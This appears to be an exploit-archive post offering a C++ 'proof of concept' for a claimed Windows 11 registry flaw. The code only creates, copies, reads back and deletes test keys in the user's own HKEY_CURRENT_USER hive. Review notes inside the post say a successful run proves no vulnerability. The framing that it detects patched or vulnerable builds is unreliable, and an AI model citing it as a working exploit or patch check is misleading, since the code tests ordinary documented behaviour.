============================================================================================================================================= | # Title : Microsoft Windows 11 build 10.0.22631.6199 Registry Vulnerability Testing Tool using RAII | | # Author : indoushka | | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) | | # Vendor : System built-in component. No standalone download available. | ============================================================================================================================================= [+] References : https://packetstorm.news/files/id/212253/ [+] Summary : This is a C/C++ Proof-of-Concept (PoC) program designed to test for a specific vulnerability within the Windows Registry handling mechanism, often related to key duplication or improper permission checks during certain API calls (like RegCopyTreeW). [+] The program executes the following steps: System Diagnostics (PrintSystemInfo): Gathers and prints essential information about the execution environment, including Windows Version, Build Number, and the current User Token Elevation status (Elevated, Full, Limited) to assess the security context. (Note: PrintSystemInfo and a main() entry point are not part of the listing below; a caller of TestVulnerability() must be supplied.) [+] Vulnerability Test (TestVulnerability): It creates a temporary source Registry key in HKEY_CURRENT_USER and writes a unique test value (0xDEADBEEF). It then calls RegCopyTreeW to copy the source key's contents to a shadow destination key, also in HKEY_CURRENT_USER. It verifies the success of the "copy" operation and attempts to read the test value from the newly copied shadow key. [+] Outcome: If the copy and read operation succeeds and the value matches, the program prints a success message ("[+] Copy VALID! Value matches: ..." in the listing below) and returns true. Caveat: both keys are created by the caller under its own HKEY_CURRENT_USER hive with KEY_ALL_ACCESS, so RegCopyTreeW succeeding there is its documented behavior on every supported Windows build and requires no elevation. A successful run therefore does not, by itself, demonstrate a permission-check or privilege flaw, and this test cannot distinguish a patched build from an unpatched one; a meaningful test would need a source or destination key that the calling user is not permitted to read or write. [+] Cleanup: Ensures both temporary Registry keys are deleted, regardless of the test outcome, to maintain system hygiene. 
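// In essence, the tool is a diagnostic utility used by security researchers to
// confirm whether a specific Windows build is patched or vulnerable to a known
// elevation or privilege issue involving the Registry.
//
// [+] POC :
//
// NOTE(review): the four header names in the published listing were stripped by
// the site's HTML extraction ("#include #include #include #include"), as were the
// template arguments of both reinterpret_cast calls; they are restored below to
// what the code actually uses. RegCopyTreeW/RegDeleteTreeW are Vista+ APIs
// (_WIN32_WINNT >= 0x0600) exported by advapi32. The listing contains no main()
// and no PrintSystemInfo(); a driver that calls TestVulnerability() must be supplied.
#ifndef _WIN32_WINNT
#define _WIN32_WINNT 0x0600
#endif
#include <windows.h>
#include <cstdio>
#include <utility>

// RAII owner of a registry handle: RegCloseKey runs on scope exit.
// Copying is deleted (two owners would double-close the same HKEY);
// moves transfer ownership and leave the source empty.
class UniqueRegKey {
private:
    HKEY hKey;

public:
    UniqueRegKey() : hKey(nullptr) {}
    explicit UniqueRegKey(HKEY key) : hKey(key) {}
    ~UniqueRegKey() { if (hKey) RegCloseKey(hKey); }

    UniqueRegKey(const UniqueRegKey&) = delete;
    UniqueRegKey& operator=(const UniqueRegKey&) = delete;

    UniqueRegKey(UniqueRegKey&& other) noexcept
        : hKey(std::exchange(other.hKey, nullptr)) {}
    UniqueRegKey& operator=(UniqueRegKey&& other) noexcept {
        if (this != &other) {
            reset(std::exchange(other.hKey, nullptr));
        }
        return *this;
    }

    // Borrowed view of the handle; ownership stays with this object.
    HKEY get() const { return hKey; }

    // Out-parameter slot for RegCreateKeyExW/RegOpenKeyExW. Any handle already
    // held is closed first so a second call cannot silently leak it.
    HKEY* getAddress() { reset(); return &hKey; }

    // Close the current handle (if any) and take ownership of newKey.
    void reset(HKEY newKey = nullptr) { if (hKey) RegCloseKey(hKey); hKey = newKey; }

    // Give up ownership without closing; the caller must RegCloseKey it.
    HKEY release() { return std::exchange(hKey, nullptr); }
};

namespace {

// Scope guard that deletes the temporary test keys on every return path.
// Only keys this process actually created are deleted (see sourceCreated /
// shadowCreated), so a failed run never removes a key that was already there.
struct TestKeyCleanup {
    const wchar_t* sourcePath;
    const wchar_t* shadowPath;
    bool sourceCreated = false;
    bool shadowCreated = false;

    ~TestKeyCleanup() {
        if (sourceCreated) RegDeleteTreeW(HKEY_CURRENT_USER, sourcePath);
        if (shadowCreated) RegDeleteTreeW(HKEY_CURRENT_USER, shadowPath);
    }
};

// Create `path` under HKEY_CURRENT_USER with KEY_ALL_ACCESS and store the handle
// in `out`. Returns ERROR_SUCCESS only when the key did not exist beforehand;
// if RegCreateKeyExW merely opened an existing key, the handle is closed and
// ERROR_ALREADY_EXISTS is returned so the test never reuses (and later deletes)
// a key it did not create.
LONG CreateFreshTestKey(const wchar_t* path, UniqueRegKey& out) {
    DWORD disposition = 0;
    LONG status = RegCreateKeyExW(
        HKEY_CURRENT_USER,
        path,
        0,
        nullptr,
        REG_OPTION_NON_VOLATILE,
        KEY_ALL_ACCESS,
        nullptr,
        out.getAddress(),
        &disposition
    );
    if (status == ERROR_SUCCESS && disposition != REG_CREATED_NEW_KEY) {
        out.reset();
        return ERROR_ALREADY_EXISTS;
    }
    return status;
}

} // namespace

// Create a source key holding one REG_DWORD (0xDEADBEEF), copy it into a
// second key with RegCopyTreeW, and check that the value reads back intact from
// the copy.
//
// Returns true only when RegCopyTreeW succeeds and the copied value is a
// REG_DWORD equal to the original; false on any API failure, on a type or
// value mismatch, or when either test key already existed. Both temporary keys
// are deleted on every return path (after their handles are closed).
//
// NOTE(review): both keys are created by the caller under its own
// HKEY_CURRENT_USER hive with KEY_ALL_ACCESS, so a successful copy is the
// documented behaviour of RegCopyTreeW on every supported build and needs no
// elevation. A `true` result therefore shows that the API works, not that a
// permission-check or privilege flaw exists; demonstrating that would require a
// source or destination key the calling user is not permitted to read or write.
bool TestVulnerability() {
    printf("[*] Starting Registry Copy Vulnerability Test (Enhanced PoC)\n");

    const wchar_t* sourceKeyPath = L"Software\\PoC_Vulnerability_Source";
    const wchar_t* shadowKeyPath = L"Software\\PoC_Vulnerability_Shadow";

    // Declared before the key handles so that, on scope exit, the handles are
    // closed first and the trees are deleted afterwards.
    TestKeyCleanup cleanup{sourceKeyPath, shadowKeyPath};

    // ------------------------------
    // 1. Create the source key
    // ------------------------------
    UniqueRegKey hSourceKey;
    LONG status = CreateFreshTestKey(sourceKeyPath, hSourceKey);
    if (status == ERROR_ALREADY_EXISTS) {
        printf("[!] Source key already exists; refusing to reuse a key this test did not create.\n");
        return false;
    }
    if (status != ERROR_SUCCESS) {
        printf("[!] Failed to create source key. Error: %ld\n", status);
        return false;
    }
    cleanup.sourceCreated = true;
    printf("[+] Created source key successfully.\n");

    // ------------------------------
    // 2. Write test DWORD value
    // ------------------------------
    DWORD dwTestValue = 0xDEADBEEF;
    status = RegSetValueExW(
        hSourceKey.get(),
        L"PoC_DWORD",
        0,
        REG_DWORD,
        reinterpret_cast<const BYTE*>(&dwTestValue),
        sizeof(dwTestValue)
    );
    if (status != ERROR_SUCCESS) {
        printf("[!] Failed to write test value. Error: %ld\n", status);
        return false;
    }
    printf("[+] Wrote test value: 0x%lX\n", dwTestValue);

    // ------------------------------
    // 3. Create shadow/destination key
    // ------------------------------
    UniqueRegKey hShadowKey;
    status = CreateFreshTestKey(shadowKeyPath, hShadowKey);
    if (status == ERROR_ALREADY_EXISTS) {
        printf("[!] Shadow key already exists; refusing to reuse a key this test did not create.\n");
        return false;
    }
    if (status != ERROR_SUCCESS) {
        printf("[!] Failed to create shadow key. Error: %ld\n", status);
        return false;
    }
    cleanup.shadowCreated = true;
    printf("[+] Shadow key created.\n");

    // ------------------------------
    // 4. Attempt Registry Copy (Vulnerability Trigger)
    // ------------------------------
    // An empty subkey name copies the source key itself into the destination.
    printf("[*] Triggering RegCopyTreeW copy...\n");
    status = RegCopyTreeW(hSourceKey.get(), L"", hShadowKey.get());
    if (status != ERROR_SUCCESS) {
        printf("[!] Copy operation failed. Error: %ld\n", status);
        return false;
    }
    printf("[+] Copy operation succeeded! Checking data integrity...\n");

    // ------------------------------
    // 5. Validate copied value
    // ------------------------------
    DWORD copiedValue = 0;
    DWORD size = sizeof(copiedValue);
    DWORD valueType = 0;
    LONG qStatus = RegQueryValueExW(
        hShadowKey.get(),
        L"PoC_DWORD",
        nullptr,
        &valueType,
        reinterpret_cast<LPBYTE>(&copiedValue),
        &size
    );
    if (qStatus != ERROR_SUCCESS) {
        printf("[!] Failed to read copied value! Error: %ld\n", qStatus);
        return false;
    }
    if (valueType != REG_DWORD) {
        printf("[!] Value type mismatch (expected REG_DWORD).\n");
        return false;
    }
    if (copiedValue != dwTestValue) {
        printf("[!] Value mismatch! Expected 0x%lX, Found 0x%lX\n", dwTestValue, copiedValue);
        return false;
    }

    printf("[+] Copy VALID! Value matches: 0x%lX\n", copiedValue);
    return true;
    // Cleanup (both trees) runs in ~TestKeyCleanup after the handles close.
}

// Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================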